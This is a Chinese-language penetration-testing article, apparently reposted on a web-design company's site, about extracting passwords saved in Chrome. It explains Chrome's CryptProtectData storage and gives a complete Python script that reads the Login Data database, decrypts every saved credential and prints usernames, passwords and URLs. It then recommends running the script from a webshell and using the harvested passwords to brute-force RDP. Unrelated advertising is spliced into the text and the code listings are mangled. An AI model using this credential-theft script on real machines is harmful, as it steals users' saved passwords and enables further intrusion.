密码破解之Chrome浏览器存储密码获取

在我们实战渗透内网过程中,经常会因为各种各样的密码破解问题而发愁。相对于外网来说,内网安全是较为脆弱的,因为大量的密码被重复使用,而如何获得这些非常有价值的密码,很可能就是一次渗透能否成功的关键。

十多年的文登网站建设经验,针对设计、前端、开发、售后、文案、推广等六对一服务,响应快,48小时及时工作处理。全网营销推广的优势是能够根据用户设备显示端的尺寸不同,自动调整文登建站的显示方式,使网站能够适用不同显示终端,在浏览器中调整网站的宽度,无论在任何一种浏览器上浏览网站,都能展现优雅布局与设计,从而大程度地提升浏览体验。成都创新互联从事“文登网站设计”,“文登网站推广”以来,每个客户项目都认真落实执行。

我们来详细分析一下,如何针对火狐浏览器自动保存的密码进行获取,并完成相应的程序编写。

一、关于Chrome浏览器密码存储机制:

谷歌浏览器加密后的密钥存储于%APPDATA%\..\Local\Google\Chrome\User Data\Default\Login Data”(这里的APPDATA是由系统or用户环境变量决定的)下的一个SQLite数据库中。那么他是如何加密的呢,通过开源的Chromium,我们来一探究竟:

首先,我们作为用户登录一个网站时,会在表单提交Username以及Password相应的值,Chrome会首先判断此次登录是否是一次成功的登录,部分判断代码如下:

 
 
 
 
    
  
  
  
  
  1. Provisional_save_manager_->SubmitPassed(); 
    2. 
  
  
  
  
  2.     if (provisional_save_manager_->HasGeneratedPassword()) 
    3. 
  
  
  
  
  3.         UMA_HISTOGRAM_COUNTS(“PasswordGeneration.Submitted”, 1); 
    4. 
  
  
  
  
  4.     If (provisional_save_manager_->IsNewLogin() && !provisional_save_manager_->HasGeneratedPassword()){ 
    5. 
  
  
  
  
  5.         Delegate_->AddSavePasswordInfoBarIfPermitted( 
    6. 
  
  
  
  
  6.         Provisional_save_manager_.release()); 
    7. 
  
  
  
  
  7. } else { 
    8. 
  
  
  
  
  8. provisional_save_manager_->Save(); 
    9. 
  
  
  
  
  9. Provisional_save_manager_.reset(); 
    10. 
  
  
  
  
    11.

当我们登录成功时,并且使用的是一套新的证书(也就是说是***次登录该网站),Chrome就会询问我们是否需要记住密码。

那么登录成功后,密码是如何被Chrome存储的呢?

答案在EncryptedString函数,通过调用EncryptString16函数,代码如下:

 
 
 
 
    
  
  
  
  
  1. Bool Encrypt::EncryptString(const std::string& plaintext,std::string* ciphertext) { 
    2. 
  
  
  
  
  2.     DATA_BLOB input; 
    3. 
  
  
  
  
  3.     Input.pbData = static_cast(plaintext.length()); 
    4. 
  
  
  
  
  4.      
    5. 
  
  
  
  
  5.     DATA_BLOB output; 
    6. 
  
  
  
  
  6.     BOOL result = CryptProtectData(&input, L””,NULL, NULL, NULL, 0,&output); 
    7. 
  
  
  
  
  7.     If (!result) 
    8. 
  
  
  
  
  8.         Return false; 
    9. 
  
  
  
  
  9. //复制操作 
    10. 
  
  
  
  
  10. Ciphertext->assign(reinterpret_cast(output.pbData); 
    11. 
  
  
  
  
  11. 
  
  
  
  
  12. LocalFree(output.pbData); 
    13. 
  
  
  
  
  13. Return true; 
    14. 
  
  
  
  
  14. } 
    15.

代码***利用了Widows API函数CryptProtectData(请记住这个函数,因为后面会提到它)来加密。当我们拥有证书时,密码就会被回复给我们使用。

在我们得到服务器权限后,证书的问题已经不用考虑了,所以下一步,我们解决如何获得这些密码。

二、编写脚本跑出Chrome浏览器保存的密码

因为考虑到在大多数情况下,并不能远程登录到服务器上执行GUI的程序,所以做个Python脚本跑一下是***选择,唯一的缺点是如果WINDOWS不支持PYTHON环境,Python打包成EXE文件的话会比较大。

下面考虑代码部分,因为用户不同所在用户的文件夹就不同,需要知道LOGIN DATA文件的具体路径,所以我们需要python中的os.environ从环境变量中读取LOCALAPPDATA的路径,剩下的路径是谷歌默认生成。

获取LOGINDATA文件的写法为:

 
 
 
 
    
  
  
  
  
  1. google_path = r’ Google\Chrome\User Data\Default\Login Data’ 
    2. 
  
  
  
  
  2. file_path = os.path.join(os.environ[‘LOCALAPPDATA’],google_path) 
    3. 
  
  
  
  
  3. 
  
  
  
  
  4. #Login Data文件可以利用python中的sqlite3库来操作。 
    5. 
  
  
  
  
  5. conn = sqlite3.connect(file_path) 
    6. 
  
  
  
  
  6. for row in conn.execute('select username_value, password_value, signon_realm from logins'): 
    7. 
  
  
  
  
  7. #利用Win32crpt.CryptUnprotectData来对通过加密的密码进行解密操作。 
    8. 
  
  
  
  
  8.     cursor = conn.cursor() 
    9. 
  
  
  
  
  9. cursor.execute('select username_value, password_value, signon_realm from logins') 
    10. 
  
  
  
  
  10. 
  
  
  
  
  11. #接收全部返回结果 
    12. 
  
  
  
  
  12. for data in cursor.fetchall(): 
    13. 
  
  
  
  
  13. passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0) 
    14. 
  
  
  
  
  14. #利用win32crypt.CryptUnprotectData解密后,通过输出passwd这个元组中内容,可以逐一得到Chrome浏览器存储的密码。 
    15.

这里我们用到了CryptUnprotectData这个函数,与之对应的是我们上文提到的CryptProtectData,理论上来说CryptProtectData加密的文本内容,都可以通过CryptUnprotectData函数来解密。对其他服务的解密方式,大家可以自行尝试。

三、完成实验脚本

脚本完整代码如下:

 
 
 
 
    
  
  
  
  
  1. #coding:utf8 
    2. 
  
  
  
  
  2. import os, sys 
    3. 
  
  
  
  
  3. import sqlite3 
    4. 
  
  
  
  
  4. import win32crypt 
    5. 
  
  
  
  
  5. 
  
  
  
  
  6. 
  
  
  
  
  7. google_path = r'Google\Chrome\User Data\Default\Login Data'
    8. 
  
  
  
  
  8. 
  
  
  
  
  9. 
  
  
  
  
  10. db_file_path = os.path.join(os.environ['LOCALAPPDATA'],google_path) 
    11. 
  
  
  
  
  11. conn = sqlite3.connect(db_file_path) 
    12. 
  
  
  
  
  12. cursor = conn.cursor() 
    13. 
  
  
  
  
  13. cursor.execute('select username_value, password_value, signon_realm from logins') 
    14. 
  
  
  
  
  14. 
  
  
  
  
  15. #接收全部返回结果 
    16. 
  
  
  
  
  16. for data in cursor.fetchall(): 
    17. 
  
  
  
  
  17.     passwd = win32crypt.CryptUnprotectData(data[1],None,None,None,0) 
    18. 
  
  
  
  
  18.      
    19. 
  
  
  
  
  19.     if passwd: 
    20. 
  
  
  
  
  20.         print '-------------------------'
    21. 
  
  
  
  
  21.         print u'[+]用户名: ' + data[0]  
    22. 
  
  
  
  
  22.         print u'[+]密码: ' + passwd[1]  
    23. 
  
  
  
  
  23.         print u'[+]网站URL: ' + data[2] 
    24.

效果如下:

当然,在取得服务器webshell的情况下,如果有执行权限但无法提权,可以利用这种方法挖掘密码,进而再利用社工思路对服务器RDP服务密码进行暴力破解。

如果Webshell不能回显,可以用类似getpass一样的方式,导出到文本中。

Python chrome.py > 1.txt

(提示:导出过程中,输出中文可能会报错,建议换成英文导出。)

注意:在用户打开Chrome时,Login Data文件是被上锁的,如果这时想要对其进行读取操作,可以将Login Data文件复制到临时目录进行读取操作。

网页题目:密码破解之Chrome浏览器存储密码获取
URL链接:http://www.shufengxianlan.com/qtweb/news10/246960.html

成都网站建设公司_创新互联,为您提供云服务器移动网站建设动态网站python品牌网站设计定制网站

广告

声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联

猜你还喜欢下面的内容

网站建设知识

分类信息网站

腾讯香港免备案空间    四川黔盛装饰    微信小程序    成都App定制    云服务器香港    江油网站建设    定制网站    成都广告公司    珉田数据中心    重庆企业网站建设    标志设计    成都网站制作    简阳做网站    网站运维托管    网站运营    成都托管服务器    成都网站制作    网站开发    邛崃网站建设    注册域名